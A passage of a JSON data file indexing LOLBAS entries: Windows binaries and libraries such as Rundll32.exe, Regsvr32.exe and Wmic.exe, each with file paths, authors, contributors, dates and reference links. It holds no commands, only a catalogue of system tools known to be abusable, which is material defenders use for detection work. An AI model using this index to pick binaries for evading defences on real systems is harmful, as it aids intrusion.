OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files (x86)\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"],"author":"Elliot Killick","created":"2021-08-22T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"],"count":1},{"id":"lolbas:pcalua-exe","name":"Pcalua.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\pcalua.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Kyle Hanslovan @kylehanslovan","Fab @0rbz_"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"],"count":3},{"id":"lolbas:pcwrun-exe","name":"Pcwrun.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken","Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"],"count":2},{"id":"lolbas:pktmon-exe","name":"Pktmon.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"author":"Derek Johnson","created":"2020-08-12T00:00:00.000Z","contributors":["Derek Johnson"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"],"count":2},{"id":"lolbas:pnputil-exe","name":"Pnputil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\system32\\pnputil.exe"],"author":"Hai vaknin (lux)","created":"2020-12-25T00:00:00.000Z","contributors":["Hai Vaknin(Lux) @LuxNoBulIshit","Avihay eldad @aloneliassaf"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pnputil/"],"count":1},{"id":"lolbas:presentationhost-exe","name":"Presentationhost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"],"count":2},{"id":"lolbas:print-exe","name":"Print.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Print/"],"count":3},{"id":"lolbas:printbrm-exe","name":"PrintBrm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"author":"Elliot Killick","created":"2021-06-21T00:00:00.000Z","contributors":["Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"],"count":2},{"id":"lolbas:provlaunch-exe","name":"Provlaunch.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\provlaunch.exe"],"author":"Grzegorz Tworek","created":"2023-06-30T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/"],"count":1},{"id":"lolbas:psr-exe","name":"Psr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\psr.exe","c:\\windows\\syswow64\\psr.exe"],"author":"Leon Rodenko","created":"2020-06-27T00:00:00.000Z","contributors":["Leon Rodenko @L3m0nada"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Psr/"],"count":1},{"id":"lolbas:query-exe","name":"Query.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\query.exe","c:\\windows\\syswow64\\query.exe"],"author":"Idan Lerman","created":"2025-07-31T00:00:00.000Z","contributors":["Idan Lerman @IdanLerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Query/"],"count":1},{"id":"lolbas:rasautou-exe","name":"Rasautou.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rasautou.exe"],"author":"Tony Lambert","created":"2020-01-10T00:00:00.000Z","contributors":["FireEye @FireEye"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Rasautou/"],"count":1},{"id":"lolbas:rdrleakdiag-exe","name":"rdrleakdiag.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\rdrleakdiag.exe","c:\\Windows\\SysWOW64\\rdrleakdiag.exe"],"author":"John Dwyer","created":"2022-05-18T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/rdrleakdiag/"],"count":3},{"id":"lolbas:reg-exe","name":"Reg.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\reg.exe","C:\\Windows\\SysWOW64\\reg.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reg/"],"count":2},{"id":"lolbas:regasm-exe","name":"Regasm.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regasm/"],"count":2},{"id":"lolbas:regedit-exe","name":"Regedit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\regedit.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regedit/"],"count":2},{"id":"lolbas:regini-exe","name":"Regini.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\regini.exe","C:\\Windows\\SysWOW64\\regini.exe"],"author":"Oddvar Moe","created":"2020-07-03T00:00:00.000Z","contributors":["Eli Salem @elisalem9"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regini/"],"count":1},{"id":"lolbas:register-cimprovider-exe","name":"Register-cimprovider.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\Register-cimprovider.exe","C:\\Windows\\SysWOW64\\Register-cimprovider.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Philip Tsukerman @PhilipTsukerman"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/"],"count":1},{"id":"lolbas:regsvcs-exe","name":"Regsvcs.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"],"count":2},{"id":"lolbas:regsvr32-exe","name":"Regsvr32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"count":6},{"id":"lolbas:replace-exe","name":"Replace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["elceef @elceef"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Replace/"],"count":2},{"id":"lolbas:reset-exe","name":"Reset.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\reset.exe","c:\\windows\\syswow64\\reset.exe"],"author":"Matan Bahar","created":"2025-07-31T00:00:00.000Z","contributors":["Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Reset/"],"count":1},{"id":"lolbas:rpcping-exe","name":"Rpcping.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rpcping.exe","C:\\Windows\\SysWOW64\\rpcping.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Vincent Yiu @vysecurity","Antonio Cocomazzi @splinter_code","ap @decoder_it"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Rpcping/"],"count":2},{"id":"lolbas:rundll32-exe","name":"Rundll32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\rundll32.exe","C:\\Windows\\SysWOW64\\rundll32.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Oddvar Moe @oddvarmoe","Jimmy @bohops","Sailay @404death","Martin Ingesen @Mrtn9"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Rundll32/"],"count":5},{"id":"lolbas:runexehelper-exe","name":"Runexehelper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\runexehelper.exe"],"author":"Grzegorz Tworek","created":"2022-12-13T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/"],"count":1},{"id":"lolbas:runonce-exe","name":"Runonce.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\runonce.exe","C:\\Windows\\SysWOW64\\runonce.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Runonce/"],"count":1},{"id":"lolbas:runscripthelper-exe","name":"Runscripthelper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\\Runscripthelper.exe","C:\\Windows\\WinSxS\\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\\Runscripthelper.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Graeber @mattifestation"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/"],"count":1},{"id":"lolbas:sc-exe","name":"Sc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\sc.exe","C:\\Windows\\SysWOW64\\sc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Sc/"],"count":2},{"id":"lolbas:schtasks-exe","name":"Schtasks.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\schtasks.exe","c:\\windows\\syswow64\\schtasks.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Schtasks/"],"count":2},{"id":"lolbas:scp-exe","name":"scp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\OpenSSH\\scp.exe"],"author":"BinFault","created":"2026-06-03T00:00:00.000Z","contributors":["BinFault @binfault","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/scp/"],"count":2},{"id":"lolbas:scriptrunner-exe","name":"Scriptrunner.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\scriptrunner.exe","C:\\Windows\\SysWOW64\\scriptrunner.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Tyrer @nicktyrer"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/"],"count":2},{"id":"lolbas:setres-exe","name":"Setres.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\setres.exe"],"author":"Grzegorz Tworek","created":"2022-10-21T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Setres/"],"count":1},{"id":"lolbas:settingsynchost-exe","name":"SettingSyncHost.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\SettingSyncHost.exe","C:\\Windows\\SysWOW64\\SettingSyncHost.exe"],"author":"Elliot Killick","created":"2021-08-26T00:00:00.000Z","contributors":["Adam @hexacorn","Elliot Killick @elliotkillick"],"references":["https://lolbas-project.github.io/lolbas/Binaries/SettingSyncHost/"],"count":2},{"id":"lolbas:sftp-exe","name":"Sftp.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\OpenSSH\\sftp.exe"],"author":"Swachchhanda Shrawan Poudel","created":"2025-05-13T00:00:00.000Z","contributors":["Swachchhanda Shrawan Poudel @_swachchhanda_","Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Sftp/"],"count":2},{"id":"lolbas:sigverif-exe","name":"Sigverif.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\sigverif.exe","C:\\Windows\\SysWOW64\\sigverif.exe"],"author":"Moshe Kaplan","created":"2021-11-08T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet","Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Sigverif/"],"count":1},{"id":"lolbas:ssh-exe","name":"ssh.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\OpenSSH\\ssh.exe"],"author":"Akshat Pradhan","created":"2021-11-08T00:00:00.000Z","contributors":["Akshat Pradhan","Felix Boulet","Edo Maland"],"references":["https://lolbas-project.github.io/lolbas/Binaries/ssh/"],"count":3},{"id":"lolbas:stordiag-exe","name":"Stordiag.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\stordiag.exe","c:\\windows\\syswow64\\stordiag.exe"],"author":"Eral4m","created":"2021-10-21T00:00:00.000Z","contributors":["Eral4m @eral4m","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Stordiag/"],"count":2},{"id":"lolbas:syncappvpublishingserver-exe","name":"SyncAppvPublishingServer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\SyncAppvPublishingServer.exe","C:\\Windows\\SysWOW64\\SyncAppvPublishingServer.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Nick Landers @monoxgas"],"references":["https://lolbas-project.github.io/lolbas/Binaries/SyncAppvPublishingServer/"],"count":1},{"id":"lolbas:tar-exe","name":"Tar.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\tar.exe","C:\\Windows\\SysWOW64\\tar.exe"],"author":"Brian Lucero","created":"2023-01-30T00:00:00.000Z","contributors":["Brian Lucero @Cyber_Sorcery","Avester Fahimipour"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Tar/"],"count":3},{"id":"lolbas:ttdinject-exe","name":"Ttdinject.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\ttdinject.exe","C:\\Windows\\Syswow64\\ttdinject.exe"],"author":"Maxime Nadeau","created":"2020-05-12T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","Maxime Nadeau @m_nad0"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/"],"count":2},{"id":"lolbas:tttracer-exe","name":"Tttracer.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\tttracer.exe","C:\\Windows\\SysWOW64\\tttracer.exe"],"author":"Oddvar Moe","created":"2019-11-05T00:00:00.000Z","contributors":["Onur Ulusoy @oulusoyum","Matt Graeber @mattifestation"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Tttracer/"],"count":2},{"id":"lolbas:unregmp2-exe","name":"Unregmp2.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\unregmp2.exe","C:\\Windows\\SysWOW64\\unregmp2.exe"],"author":"Wade Hickey","created":"2021-12-06T00:00:00.000Z","contributors":["Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/"],"count":1},{"id":"lolbas:vbc-exe","name":"vbc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\vbc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\vbc.exe"],"author":"Lior Adar","created":"2020-02-27T00:00:00.000Z","contributors":["Lior Adar","Hai Vaknin(Lux)"],"references":["https://lolbas-project.github.io/lolbas/Binaries/vbc/"],"count":2},{"id":"lolbas:verclsid-exe","name":"Verclsid.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\verclsid.exe","C:\\Windows\\SysWOW64\\verclsid.exe"],"author":"@bohops","created":"2018-12-04T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Verclsid/"],"count":1},{"id":"lolbas:vssadmin-exe","name":"Vssadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\vssadmin.exe"],"author":"mmadersbacher","created":"2026-08-16T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/Vssadmin/"],"count":1},{"id":"lolbas:wab-exe","name":"Wab.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\Windows Mail\\wab.exe","C:\\Program Files (x86)\\Windows Mail\\wab.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @Hexacorn"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wab/"],"count":1},{"id":"lolbas:wbadmin-exe","name":"wbadmin.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbadmin.exe"],"author":"Chris Eastwood","created":"2024-04-05T00:00:00.000Z","contributors":[],"references":["https://lolbas-project.github.io/lolbas/Binaries/wbadmin/"],"count":2},{"id":"lolbas:wbemtest-exe","name":"wbemtest.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\wbem\\wbemtest.exe"],"author":"saulpanders","created":"2025-04-22T00:00:00.000Z","contributors":["Paul Sanders @saulpanders"],"references":["https://lolbas-project.github.io/lolbas/Binaries/wbemtest/"],"count":1},{"id":"lolbas:winget-exe","name":"winget.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\winget.exe"],"author":"Paul Sanders","created":"2022-01-03T00:00:00.000Z","contributors":["Paul @saulpanders","Konrad 'unrooted' Klawikowski","Fredrik H. Brathen"],"references":["https://lolbas-project.github.io/lolbas/Binaries/winget/"],"count":3},{"id":"lolbas:wlrmdr-exe","name":"Wlrmdr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\wlrmdr.exe"],"author":"Moshe Kaplan","created":"2022-02-16T00:00:00.000Z","contributors":["Grzegorz Tworek @0gtweet","Oddvar Moe @Oddvarmoe","Freddy @falsneg"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/"],"count":1},{"id":"lolbas:wmic-exe","name":"Wmic.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"count":7},{"id":"lolbas:workfolders-exe","name":"WorkFolders.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"author":"Elliot Killick","created":"2021-08-16T00:00:00.000Z","contributors":["John Carroll @YoSignals","Elliot Killick @elliotkillick","Naor Evgi @ghosts621"],"references":["https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"],"count":2},{"id":"lolbas:wscript-exe","name":"Wscript.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Oddvar Moe @oddvarmoe","SaiLay(valen) @404death"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wscript/"],"count":2},{"id":"lolbas:wsreset-exe","name":"Wsreset.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wsreset.exe"],"author":"Oddvar Moe","created":"2019-03-18T00:00:00.000Z","contributors":["Hashim Jawad @ihack4falafel"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"],"count":1},{"id":"lolbas:wuauclt-exe","name":"wuauclt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\wuauclt.exe","C:\\Windows\\UUS\\amd64\\wuauclt.exe"],"author":"David Middlehurst","created":"2020-09-23T00:00:00.000Z","contributors":["David Middlehurst @dtmsecurity"],"references":["https://lolbas-project.github.io/lolbas/Binaries/wuauclt/"],"count":1},{"id":"lolbas:xwizard-exe","name":"Xwizard.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Adam @Hexacorn","Nick Tyrer @NickTyrer","harr0ey @harr0ey","Wade Hickey @notwhickey"],"references":["https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"],"count":3},{"id":"lolbas:msedge-proxy-exe","name":"msedge_proxy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"author":"Mert Daş","created":"2023-08-18T00:00:00.000Z","contributors":["Mert Daş @merterpreter"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"],"count":2},{"id":"lolbas:msedgewebview2-exe","name":"msedgewebview2.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"author":"Matan Bahar","created":"2023-06-15T00:00:00.000Z","contributors":["Uriel Kosayev @MalFuzzer","Hai Vaknin @VakninHai","Tamir Yehuda @Tamirye94","Matan Bahar @Bl4ckShad3"],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"],"count":4},{"id":"lolbas:odbcad32-exe","name":"odbcad32.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["c:\\windows\\system32\\odbcad32.exe","c:\\windows\\syswow64\\odbcad32.exe"],"author":"Ekitji","created":"2025-09-04T00:00:00.000Z","contributors":["amonitoring","Ekitji @eki_erk"],"references":["https://lolbas-project.github.io/lolbas/Binaries/odbcad32/"],"count":1},{"id":"lolbas:setupugc-exe","name":"setupugc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\System32\\setupugc.exe","C:\\Windows\\SysWOW64\\setupugc.exe"],"author":"Ang Kar Min","created":"2026-04-20T00:00:00.000Z","contributors":["Ang Kar Min @karminang"],"references":["https://lolbas-project.github.io/lolbas/Binaries/setupugc/"],"count":2},{"id":"lolbas:write-exe","name":"write.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Windows\\write.exe","C:\\Windows\\System32\\write.exe","C:\\Windows\\SysWOW64\\write.exe"],"author":"Michal Belzak","created":"2025-06-17T00:00:00.000Z","contributors":["Michal Belzak"],"references":["https://lolbas-project.github.io/lolbas/Binaries/write/"],"count":1},{"id":"lolbas:wt-exe","name":"wt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"Binary","aliases":[],"fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_<version_packageid>\\wt.exe"],"author":"Nasreddine Bencherchali","created":"2022-07-27T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://lolbas-project.github.io/lolbas/Binaries/wt/"],"count":1},{"id":"lolbas:advpack-dll","name":"Advpack.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\advpack.dll","c:\\windows\\syswow64\\advpack.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy (LaunchINFSection) @bohops","Fabrizio (RegisterOCX - DLL) @0rbz_","Moriarty (RegisterOCX - CMD) @moriarty_meng","Nick Carr (Threat Intel) @ItsReallyNick"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Advpack/"],"count":5},{"id":"lolbas:desk-cpl","name":"Desk.cpl","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Windows\\System32\\desk.cpl","C:\\Windows\\SysWOW64\\desk.cpl"],"author":"Hai Vaknin","created":"2022-04-21T00:00:00.000Z","contributors":["Rafael S Marques @pegabizu","Pierre-Alexandre Braeken @pabraeken","hai @VakninHai","Christopher Peacock @SecurePeacock","Jose Luis Sanchez @Joseliyo_Jstnk"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Desk/"],"count":2},{"id":"lolbas:dfshim-dll","name":"Dfshim.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://lolbas-project.github.io/lolbas/Libraries/Dfshim/"],"count":1},{"id":"lolbas:ieadvpack-dll","name":"Ieadvpack.dll","source":"LOLBAS","platform":["Windows"],"toolType":"Library","aliases":[],"fullPath":["c:\\windows\\system32\\ieadvpack.dll","c:\\windows\\syswow64\\ieadvpack.dll"],"author":"LOLBAS Team","created":"2018-05-25T00:00:00.000Z","contributors":["Jimmy (LaunchINFSection) @bohops","Fabrizio (RegisterOCX - DLL) @0rbz_","Pierre-Alexandre Braeken (RegisterOCX - CMD) 